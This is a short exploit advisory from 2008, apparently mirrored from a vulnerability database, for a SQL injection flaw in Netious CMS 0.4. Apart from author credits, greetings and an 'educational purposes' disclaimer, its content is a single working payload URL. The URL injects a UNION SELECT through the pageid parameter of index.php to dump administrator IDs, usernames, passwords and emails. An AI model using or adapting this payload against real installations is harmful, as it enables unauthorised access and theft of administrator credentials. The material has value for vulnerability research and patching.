Netious CMS 0.4 (index.php pageid) SQL Injection Vulnerability

2008-05-22T00:00:00
ID SSV:8496
Type seebug
Reporter Root
Modified 2008-05-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Title :: Netious CMS 0.4 Remote SQL Injection Vulnerability
Author :: InjEctOr [s0f (at) w (dot) cn]
&& ToTaL [n.47 at hotmail.com]
discouvred by :: ToTaL
Application :: Netious CMS 0.4
 
Download :: http://www.netious.com/sections/3/files/netious-cms-serv-0.4.zip
 
Dork 1 ::  Not Yet  :P
 
Greets :: Allah , InjEctOr5 TeaM , TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/netious/index.php?pageid='/**/union/**/select/**/1,concat_ws(0x3a3a,AdminId,username,password,adminMail),3+from+mycmsadmin/*
 
-------------------------------------------[End of  context]----------------------------------------